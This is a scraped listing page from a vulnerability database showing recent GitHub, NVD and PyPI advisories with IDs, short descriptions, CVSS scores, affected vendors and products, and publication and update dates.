Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-wqxv-v2vg-q37x (github) Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenti... 2025-04-25T18:31:12Z 2025-05-05T15:30:53Z
ghsa-mqrj-rhjj-jp5m (github) In the Linux kernel, the following vulnerability has been resolved: bpf: track changes_pkt_data ... 2025-05-05T15:30:53Z 2025-05-05T15:30:53Z
ghsa-c44x-92pj-2rvh (github) SourceCodester Web Based Pharmacy Product Management System 1.0 is vulnerable to Cross Site Scrip... 2025-05-05T15:30:53Z 2025-05-05T15:30:53Z
ghsa-8r3j-hpqx-m8fj (github) Incorrect Privilege Assignment vulnerability in Brainstorm Force SureTriggers allows Privilege Es... 2025-05-01T12:31:16Z 2025-05-05T15:30:53Z
ghsa-89vf-65xc-w22w (github) Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was w... 2025-05-05T15:30:53Z 2025-05-05T15:30:53Z
ghsa-5qcr-g689-6g4f (github) Improper access control in PAM feature in Devolutions Server 2025.1.6.0 and earlier allows a PAM ... 2025-05-05T15:30:53Z 2025-05-05T15:30:53Z
ghsa-4grv-gh63-6248 (github) The Newsletter WordPress plugin before 8.7.1 does not sanitise and escape some of its settings, ... 2025-05-05T06:30:24Z 2025-05-05T15:30:53Z
ghsa-28h8-49pj-mw67 (github) In the Linux kernel, the following vulnerability has been resolved: bpf: check changes_pkt_data ... 2025-05-05T15:30:53Z 2025-05-05T15:30:53Z
ghsa-6hjf-ffg5-v8w7 (github) A vulnerability has been identified in Node.js version 20, affecting users of the experimental pe... 2023-09-20T15:30:49Z 2025-05-05T15:30:45Z
ghsa-xjvv-5w4r-hfmv (github) Buffer Overflow vulnerability in function LoadPixelDataRLE8 in PluginBMP.cpp in FreeImage 3.18.0 ... 2023-08-22T21:30:25Z 2025-05-05T15:30:44Z
ghsa-vc5p-9c2v-8jwq (github) A path traversal vulnerability in ZKTeco BioTime v8.5.5 allows attackers to write arbitrary files... 2023-08-04T00:30:16Z 2025-05-05T15:30:44Z
ghsa-qrgg-mgwx-hq8f (github) Buffer Overflow vulnerability in FreeImage_Load function in FreeImage Library 3.19.0(r1828) allow... 2023-08-22T21:30:25Z 2025-05-05T15:30:44Z
ghsa-7xfv-pf6f-p6v2 (github) Insecure access control in ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read sensiti... 2023-08-04T00:30:16Z 2025-05-05T15:30:44Z
ghsa-27mv-5vpc-8g53 (github) A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated ... 2023-08-04T00:30:15Z 2025-05-05T15:30:43Z
ghsa-crwf-v7hm-2cqq (github) CandidATS version 3.0.0 on 'sortBy' of the 'ajax.php' resource, allows an external attacker to st... 2022-11-04T12:00:25Z 2025-05-05T15:30:42Z
ghsa-8v8c-wrxg-38v2 (github) CandidATS version 3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to stea... 2022-11-04T12:00:25Z 2025-05-05T15:30:42Z
ghsa-5587-9qwv-rggc (github) CandidATS version 3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacke... 2022-11-04T12:00:25Z 2025-05-05T15:30:42Z
ghsa-xhh6-6v9x-7wmr (github) CandidATS version 3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to... 2022-11-04T12:00:25Z 2025-05-05T15:30:41Z
ghsa-942w-mcgr-2rjq (github) CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application... 2022-11-04T12:00:25Z 2025-05-05T15:30:41Z
ghsa-c524-q7r6-h3vj (github) D-Link DIR-823G v1.0.2 was found to contain a command injection vulnerability in the function Set... 2022-11-03T19:00:27Z 2025-05-05T15:30:39Z
ghsa-6jrf-5qcg-qcqx (github) CandidATS version 3.0.0 allows an external attacker to steal the cookie of arbitrary users. This ... 2022-11-03T19:00:23Z 2025-05-05T15:30:39Z
ghsa-4cm4-r3q9-95wh (github) SalonERP version 3.0.2 allows an external attacker to steal the cookie of arbitrary users. This i... 2022-11-03T19:00:23Z 2025-05-05T15:30:39Z
ghsa-3fq7-mmjq-fv4x (github) CandidATS version 3.0.0 allows an external attacker to elevate privileges in the application. Thi... 2022-11-03T19:00:23Z 2025-05-05T15:30:39Z
ghsa-v9q2-jxcm-rm4c (github) Alpine before 2.25 allows remote attackers to cause a denial of service (daemon crash) when LIST ... 2022-11-03T12:00:26Z 2025-05-05T15:30:38Z
ghsa-3r97-xp9v-83jf (github) Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains a plugins/sudoers/auth/pas... 2022-11-02T19:00:31Z 2025-05-05T15:30:38Z
ghsa-hpr7-5g9m-r2j8 (github) A vulnerability was found in Mechrevo Control Console 1.0.2.70. It has been rated as critical. Af... 2025-05-05T12:30:34Z 2025-05-05T12:30:34Z
ghsa-33cx-2vvq-mf52 (github) Vulnerability in Best Practical Solutions, LLC's Request Tracker v5.0.7, where the Triple DES (3D... 2025-05-05T12:30:34Z 2025-05-05T12:30:34Z
ghsa-p9pq-9xhx-6pgq (github) A vulnerability was found in TOTOLINK A720R 4.1.5cu.374 and classified as critical. This issue af... 2025-05-05T09:31:09Z 2025-05-05T09:31:09Z
ghsa-cfcp-527j-53hf (github) A vulnerability has been found in TOTOLINK A720R 4.1.5cu.374 and classified as critical. This vul... 2025-05-05T09:31:09Z 2025-05-05T09:31:09Z
ghsa-9hcv-xw76-m4h6 (github) A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive... 2025-03-14T09:34:06Z 2025-05-05T09:31:09Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2025-46590 (NVD) CVSS-v3.1: 6.3 Bypass vulnerability in the network search instruction authentication module Impact: Successful exploitation of this vulnerability can bypass authentication and enable access to some network search functions. Huawei
 HarmonyOS
 2025-05-06T07:18:32.156Z 2025-05-06T13:40:12.938Z
cve-2025-45613 (NVD) N/A Incorrect access control in the component /user/list of Shiro-Action v0.6 allows attackers to access sensitive information via a crafted payload. n/a
 n/a
 2025-05-05T00:00:00.000Z 2025-05-06T13:39:27.522Z
cve-2025-4348 (NVD) D-Link DIR-600L formSetWanL2TP buffer overflow D-Link
 DIR-600L
 2025-05-06T11:00:06.944Z 2025-05-06T13:36:45.142Z
cve-2025-4300 (NVD) itsourcecode Content Management System search_list.php sql injection itsourcecode
 Content Management System
 2025-05-06T00:00:10.110Z 2025-05-06T13:36:30.665Z
cve-2025-4301 (NVD) itsourcecode Content Management System search-notice.php sql injection itsourcecode
 Content Management System
 2025-05-06T00:31:04.712Z 2025-05-06T13:35:40.704Z
cve-2025-4356 (NVD) Tenda DAP-1520 Authentication storage mod_graph_auth_uri_handler stack-based overflow Tenda
 DAP-1520
 2025-05-06T13:00:09.716Z 2025-05-06T13:35:05.883Z
cve-2025-4308 (NVD) PHPGurukul Art Gallery Management System add-art-type.php sql injection PHPGurukul
 Art Gallery Management System
 2025-05-06T02:31:05.284Z 2025-05-06T13:33:52.032Z
cve-2025-46591 (NVD) CVSS-v3.1: 6.2 Out-of-bounds data read vulnerability in the authorization module Impact: Successful exploitation of this vulnerability may affect service confidentiality. Huawei
 HarmonyOS
 2025-05-06T07:19:18.660Z 2025-05-06T13:30:50.959Z
cve-2025-0984 (NVD) CVSS-v3.1: 8.2 Arbitrary File Upload in Netoloji Software's E-Flow Netoloji Software
 E-Flow
 2025-05-06T11:24:44.539Z 2025-05-06T13:30:47.522Z
cve-2025-4349 (NVD) D-Link DIR-600L formSysCmd command injection D-Link
 DIR-600L
 2025-05-06T11:31:04.439Z 2025-05-06T13:29:54.757Z
cve-2025-4350 (NVD) D-Link DIR-600L wake_on_lan command injection D-Link
 DIR-600L
 2025-05-06T11:31:06.350Z 2025-05-06T13:28:48.495Z
cve-2025-4352 (NVD) Golden Link Secondary System tcEntrFlowSelect.htm sql injection Golden Link
 Secondary System
 2025-05-06T12:00:07.536Z 2025-05-06T13:27:12.820Z
cve-2025-46592 (NVD) CVSS-v3.1: 4.4 Null pointer dereference vulnerability in the USB HDI driver module Impact: Successful exploitation of this vulnerability may affect availability. Huawei
 HarmonyOS
 2025-05-06T07:20:14.446Z 2025-05-06T13:27:01.969Z
cve-2025-46593 (NVD) CVSS-v3.1: 5.1 Process residence vulnerability in abnormal scenarios in the print module Impact: Successful exploitation of this vulnerability may affect availability. Huawei
 HarmonyOS
 2025-05-06T07:21:03.582Z 2025-05-06T13:26:16.450Z
cve-2025-3281 (NVD) User Registration & Membership – Custom Registration Form, Login Form, and User Profile <= 4.2.1 - Insecure Direct Object Reference to Unauthenticated Limited User Deletion wpeverest
 User Registration & Membership – Custom Registration Form, Login Form, and User Profile
 2025-05-06T07:24:21.668Z 2025-05-06T13:25:25.517Z
cve-2025-4353 (NVD) Golden Link Secondary System queryTsDictionaryType.htm sql injection Golden Link
 Secondary System
 2025-05-06T12:00:09.711Z 2025-05-06T13:24:48.956Z
cve-2025-4331 (NVD) SourceCodester Online Student Clearance System login.php sql injection SourceCodester
 Online Student Clearance System
 2025-05-06T07:31:04.308Z 2025-05-06T13:23:04.702Z
cve-2025-4354 (NVD) Tenda DAP-1520 storage check_dws_cookie stack-based overflow Tenda
 DAP-1520
 2025-05-06T12:31:05.656Z 2025-05-06T13:17:16.484Z
cve-2024-45570 (NVD) CVSS-v3.1: 6.6 Use of Out-of-range Pointer Offset in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:03.782Z 2025-05-06T13:16:58.613Z
cve-2025-4355 (NVD) Tenda DAP-1520 api set_ws_action heap-based overflow Tenda
 DAP-1520
 2025-05-06T12:31:10.092Z 2025-05-06T13:14:35.053Z
cve-2024-31860 (NVD) Apache Zeppelin: Path traversal vulnerability Apache Software Foundation
 Apache Zeppelin
 2024-04-09T09:08:28.802Z 2025-05-06T13:12:31.467Z
cve-2024-27906 (NVD) Apache Airflow: Dag Code and Import Error Permissions Ignored Apache Software Foundation
 Apache Airflow
 2024-02-29T11:02:19.310Z 2025-05-06T13:12:13.352Z
cve-2024-21742 (NVD) Apache James Mime4J: Mime4J DOM header injection Apache Software Foundation
 Apache James Mime4J
 2024-02-27T16:21:16.432Z 2025-05-06T13:11:44.183Z
cve-2018-1359 (NVD) N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-05-06T12:38:03.786Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-05-06T12:38:03.786Z
cve-2025-3155 (NVD) CVSS-v3.1: 7.4 Yelp: arbitrary file read Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
 Red Hat Enterprise Linux 8.2 Advanced Update Support
Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support
Red Hat Enterprise Linux 8.4 Telecommunications Update Service
Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions
Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support
Red Hat Enterprise Linux 8.6 Telecommunications Update Service
Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions
Red Hat Enterprise Linux 8.8 Extended Update Support
Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions
Red Hat Enterprise Linux 9.2 Extended Update Support
Red Hat Enterprise Linux 9.4 Extended Update Support
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
 2025-04-03T13:34:18.878Z 2025-05-06T12:20:38.200Z
cve-2024-11831 (NVD) CVSS-v3.1: 5.4 Npm-serialize-javascript: cross-site scripting (xss) in serialize-javascript
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat Advanced Cluster Security 4.4
Red Hat Advanced Cluster Security 4.5
Red Hat Enterprise Linux 9
RHODF-4.18-RHEL-9
RHODF-4.18-RHEL-9
RHODF-4.18-RHEL-9
Cryostat 3
Logging Subsystem for Red Hat OpenShift
Migration Toolkit for Virtualization
.NET 6.0 on Red Hat Enterprise Linux
OpenShift Lightspeed
OpenShift Pipelines
OpenShift Pipelines
OpenShift Pipelines
OpenShift Pipelines
OpenShift Serverless
OpenShift Service Mesh 2
OpenShift Service Mesh 2
Red Hat 3scale API Management Platform 2
Red Hat Advanced Cluster Management for Kubernetes 2
Red Hat Advanced Cluster Security 4
Red Hat Advanced Cluster Security 4
Red Hat Advanced Cluster Security 4
Red Hat Advanced Cluster Security 4
Red Hat Advanced Cluster Security 4
Red Hat Ansible Automation Platform 2
Red Hat Ansible Automation Platform 2
Red Hat Ansible Automation Platform 2
Red Hat Ansible Automation Platform 2
Red Hat build of Apache Camel - HawtIO 4
Red Hat build of Apicurio Registry 2
Red Hat build of OptaPlanner 8
Red Hat Data Grid 8
Red Hat Developer Hub
Red Hat Discovery
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Fuse 7
Red Hat Integration Camel K 1
Red Hat JBoss Enterprise Application Platform 7
Red Hat JBoss Enterprise Application Platform 8
Red Hat JBoss Enterprise Application Platform Expansion Pack
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift Container Platform 3.11
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Dev Spaces
Red Hat OpenShift Dev Spaces
Red Hat OpenShift Dev Spaces
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat OpenShift distributed tracing 3
Red Hat Process Automation 7
Red Hat Quay 3
Red Hat Satellite 6
Red Hat Satellite 6
Red Hat Single Sign-On 7
Red Hat Trusted Profile Analyzer
 2025-02-10T15:27:46.732Z 2025-05-06T08:23:43.794Z
cve-2024-3567 (NVD) CVSS-v3.1: 5.5 Qemu-kvm: net: assertion failure in update_sctp_checksum()
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8 Advanced Virtualization
 2024-04-10T14:32:02.343Z 2025-05-06T08:11:33.546Z
cve-2023-6693 (NVD) CVSS-v3.1: 4.9 Qemu: virtio-net: stack buffer overflow in virtio_net_flush_tx() Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
 Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8 Advanced Virtualization
 2024-01-02T09:15:08.280Z 2025-05-06T08:11:12.675Z
cve-2025-21590 (NVD) CVSS-v3.1: 4.4 CVSS-v4.0: 6.7 Junos OS: An local attacker with shell access can execute arbitrary code Juniper Networks
 Junos OS
 2025-03-12T13:59:43.038Z 2025-05-06T08:00:02.011Z
cve-2025-2487 (NVD) CVSS-v3.1: 4.9 389-ds-base: null pointer dereference leads to denial of service Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
 Red Hat Directory Server 12.4 EUS for RHEL 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9.4 Extended Update Support
Red Hat Directory Server 12
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
 2025-03-18T16:25:43.712Z 2025-05-06T07:14:06.335Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2024-49829 (NVD) CVSS-v3.1: 6.7 Buffer Copy Without Checking Size of Input (`Classic Buffer Overflow`) in Camera Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:14.738Z 2025-05-07T03:55:37.794Z
cve-2024-45583 (NVD) CVSS-v3.1: 6.6 Use After Free in Secure Processor Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:13.494Z 2025-05-07T03:55:39.086Z
cve-2024-45581 (NVD) CVSS-v3.1: 6.6 Out-of-bounds Write in Audio Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:12.241Z 2025-05-07T03:55:40.584Z
cve-2024-45579 (NVD) CVSS-v3.1: 7.8 Improper Input Validation in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:11.031Z 2025-05-07T03:56:02.467Z
cve-2024-45578 (NVD) CVSS-v3.1: 7.8 Improper Validation of Array Index in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:09.792Z 2025-05-07T03:56:01.087Z
cve-2024-45577 (NVD) CVSS-v3.1: 7.8 Improper Input Validation in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:08.586Z 2025-05-07T03:55:59.774Z
cve-2024-45576 (NVD) CVSS-v3.1: 7.8 Improper Validation of Array Index in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:07.417Z 2025-05-07T03:55:58.442Z
cve-2024-45575 (NVD) CVSS-v3.1: 7.8 Integer Overflow or Wraparound in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:06.199Z 2025-05-07T03:55:56.826Z
cve-2024-45574 (NVD) CVSS-v3.1: 7.8 Improper Validation of Array Index in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:04.985Z 2025-05-07T03:55:55.510Z
cve-2024-45570 (NVD) CVSS-v3.1: 6.6 Use of Out-of-range Pointer Offset in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:03.782Z 2025-05-06T13:16:58.613Z
cve-2024-45568 (NVD) CVSS-v3.1: 6.7 Buffer Over-read in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:02.561Z 2025-05-07T03:55:54.144Z
cve-2024-45567 (NVD) CVSS-v3.1: 7.8 Use After Free in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:32:01.269Z 2025-05-07T03:55:51.423Z
cve-2024-45566 (NVD) CVSS-v3.1: 7.8 Use After Free in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:59.981Z 2025-05-07T03:55:49.482Z
cve-2024-45565 (NVD) CVSS-v3.1: 7.8 Time-of-check Time-of-use (TOCTOU) Race Condition in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:58.778Z 2025-05-07T03:55:47.625Z
cve-2024-45564 (NVD) CVSS-v3.1: 7.8 Use After Free in HLOS Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:57.537Z 2025-05-07T03:55:44.729Z
cve-2024-45563 (NVD) CVSS-v3.1: 6.6 Out-of-bounds Write in Camera Driver Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:56.320Z 2025-05-06T13:47:35.604Z
cve-2024-45562 (NVD) CVSS-v3.1: 6.6 Use After Free in HLOS Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:55.106Z 2025-05-06T13:48:09.879Z
cve-2024-45554 (NVD) CVSS-v3.1: 7.8 Use After Free in DSP Service Qualcomm, Inc.
 Snapdragon
 2025-05-06T08:31:53.725Z 2025-05-07T03:55:43.352Z
cve-2024-3567 (NVD) CVSS-v3.1: 5.5 Qemu-kvm: net: assertion failure in update_sctp_checksum()
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8 Advanced Virtualization
 2024-04-10T14:32:02.343Z 2025-05-06T08:11:33.546Z
cve-2023-6693 (NVD) CVSS-v3.1: 4.9 Qemu: virtio-net: stack buffer overflow in virtio_net_flush_tx() Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
 Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8 Advanced Virtualization
 2024-01-02T09:15:08.280Z 2025-05-06T08:11:12.675Z
cve-2025-46593 (NVD) CVSS-v3.1: 5.1 Process residence vulnerability in abnormal scenarios in the print module Impact: Successful exploitation of this vulnerability may affect availability. Huawei
 HarmonyOS
 2025-05-06T07:21:03.582Z 2025-05-06T13:26:16.450Z
cve-2025-46592 (NVD) CVSS-v3.1: 4.4 Null pointer dereference vulnerability in the USB HDI driver module Impact: Successful exploitation of this vulnerability may affect availability. Huawei
 HarmonyOS
 2025-05-06T07:20:14.446Z 2025-05-06T13:27:01.969Z
cve-2025-46591 (NVD) CVSS-v3.1: 6.2 Out-of-bounds data read vulnerability in the authorization module Impact: Successful exploitation of this vulnerability may affect service confidentiality. Huawei
 HarmonyOS
 2025-05-06T07:19:18.660Z 2025-05-06T13:30:50.959Z
cve-2025-46590 (NVD) CVSS-v3.1: 6.3 Bypass vulnerability in the network search instruction authentication module Impact: Successful exploitation of this vulnerability can bypass authentication and enable access to some network search functions. Huawei
 HarmonyOS
 2025-05-06T07:18:32.156Z 2025-05-06T13:40:12.938Z
cve-2025-46589 (NVD) CVSS-v3.1: 4.4 Vulnerability of unauthorized access in the app lock module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. Huawei
 HarmonyOS
 2025-05-06T07:17:29.134Z 2025-05-06T13:56:39.446Z
cve-2025-46588 (NVD) CVSS-v3.1: 4.4 Vulnerability of unauthorized access in the app lock module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. Huawei
 HarmonyOS
 2025-05-06T07:16:28.523Z 2025-05-06T14:01:59.835Z
cve-2025-4331 (NVD) SourceCodester Online Student Clearance System login.php sql injection SourceCodester
 Online Student Clearance System
 2025-05-06T07:31:04.308Z 2025-05-06T13:23:04.702Z
cve-2025-46587 (NVD) CVSS-v3.1: 6.2 Permission control vulnerability in the media library module Impact: Successful exploitation of this vulnerability may affect service confidentiality. Huawei
 HarmonyOS
 2025-05-06T07:14:30.179Z 2025-05-06T14:03:05.411Z
cve-2025-3281 (NVD) User Registration & Membership – Custom Registration Form, Login Form, and User Profile <= 4.2.1 - Insecure Direct Object Reference to Unauthenticated Limited User Deletion wpeverest
 User Registration & Membership – Custom Registration Form, Login Form, and User Profile
 2025-05-06T07:24:21.668Z 2025-05-06T13:25:25.517Z
cve-2025-3020 (NVD) CVSS-v3.1: 5.4 Wiesemann & Theis: Multiple W&T Products are vulnerable to cross-site-scripting Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
Wiesemann & Theis
 ERP-Gateway 12x Digital Input, 6x Digital Relais
ERP-Gateway 2x Digital Input, 2x Digital Output
ERP-Gateway 2x Digital PoE
Web-Alarm 6x6 DigitalWeb-Alarm 6x6 Digital
Web-Count 6x Digital
Web-Graph Air Quality
Web-IO 12x Digital Input, 6x Digital Relais
Web-IO 12x Digital Input, 6x Digital Relais
Web-IO 12x Digital Input, 6x Digital Relais
Web-IO Analog-In/Out 2x 0/4..20mA PoE
Web-IO Digital 12xIn, 12xOut
Web-IO Digital 12xIn, 12xOut
Web-IO Digital 12xIn, 12xOut
Web-IO Digital 12xIn, 12xOut, 1xRS232
Web-IO Digital 12xIn, 12xOut, 1xRS232
Web-IO Digital 2xIn, 2xOut
Web-IO Digital 2xIn, 2xOut
Web-IO Digital 2xIn, 2xOut
Web-IO Digital Logger 6xIn, 6xOut
Web-Thermograph 2x
Web-Thermograph 8x
Web-Thermograph NTC
Web-Thermograph NTC PoE
Web-Thermograph Pt100 / Pt1000
Web-Thermograph Pt100 / Pt1000 PoE
Web-Thermograph Relais
Web-Thermo-Hygrobarograph
Web-Thermo-Hygrograph
 2025-05-06T08:01:58.965Z 2025-05-06T13:52:19.548Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
pysec-2024-7 The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, relate... 2024-01-21T17:15:00+00:00 2024-01-21T20:21:00.484037+00:00
pysec-2024-6 cdo-local-uuid project provides a specialized UUID-generating function that can, on user request,... 2024-01-11T03:15:00+00:00 2024-01-19T22:21:07.454006+00:00
pysec-2024-4 GitPython is a python library used to interact with Git repositories. There is an incomplete fix ... 2024-01-11T02:15:00+00:00 2024-01-18T16:22:52.190857+00:00
pysec-2024-3 PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, expl... 2024-01-05T04:15:00+00:00 2024-01-17T11:19:18.629304+00:00
pysec-2023-249 Gradio is an open-source Python package that allows you to quickly build a demo or web applicatio... 2023-12-22T21:15:00+00:00 2024-01-17T11:19:18.252182+00:00
pysec-2023-248 An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers ... 2023-12-26T22:15:00+00:00 2024-01-17T11:19:18.188431+00:00
pysec-2024-2 In Appwrite CLI before 3.0.0, when using the login command, the credentials of the Appwrite user ... 2024-01-09T09:15:00+00:00 2024-01-17T11:19:17.695321+00:00
pysec-2021-878 The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling rem... 2021-10-07T14:15:00Z 2024-01-17T10:53:34.840029Z
pysec-2009-10 Unspecified vulnerability in the Zope Enterprise Objects (ZEO) storage-server functionality in Zo... 2009-09-08T18:30:00Z 2024-01-17T10:48:40.464440Z
pysec-2024-1 gratient is a user-facing library for generating color gradients of text. Version 0.5 contained o... 2024-01-03T22:31:36+00:00
pysec-2023-235 An issue was discovered in Couchbase Server 7.2.0. There is a private key leak in debug.log while... 2023-11-08T21:15:00Z 2024-01-03T21:03:33.010228Z
pysec-2023-233 Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, X... 2023-11-06T18:15:00Z 2024-01-02T15:20:59.435740Z
pysec-2021-877 An integer overflow in CrwMap::encode0x1810 of Exiv2 0.27.3 allows attackers to trigger a heap-ba... 2021-07-26T17:15:00Z 2024-01-02T15:20:59.375619Z
pysec-2018-120 There is an infinite loop in Exiv2::Jp2Image::encodeJp2Header of jp2image.cpp in Exiv2 0.27-RC3. ... 2018-12-12T10:29:00Z 2024-01-02T15:20:59.318592Z
pysec-2018-119 There is a heap-based buffer over-read in Exiv2::Jp2Image::encodeJp2Header of jp2image.cpp in Exi... 2018-12-12T10:29:00Z 2024-01-02T15:20:59.259575Z
pysec-2018-118 There is a SEGV in Exiv2::Internal::TiffParserWorker::findPrimaryGroups of tiffimage_int.cpp in E... 2018-12-12T10:29:00Z 2024-01-02T15:20:59.201635Z
pysec-2018-117 There is a heap-based buffer over-read in the Exiv2::tEXtToDataBuf function of pngimage.cpp in Ex... 2018-12-12T10:29:00Z 2024-01-02T15:20:59.143416Z
pysec-2017-112 An issue was discovered in Exiv2 0.26. When the data structure of the structure ifd is incorrect,... 2017-05-26T10:29:00Z 2024-01-02T15:20:59.086141Z
pysec-2023-234 An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryp... 2023-11-09T16:15:00Z 2024-01-02T13:04:16.284694Z
pysec-2017-111 Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to cross frame ... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.638216Z
pysec-2017-110 Error responses from Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating included stack t... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.587649Z
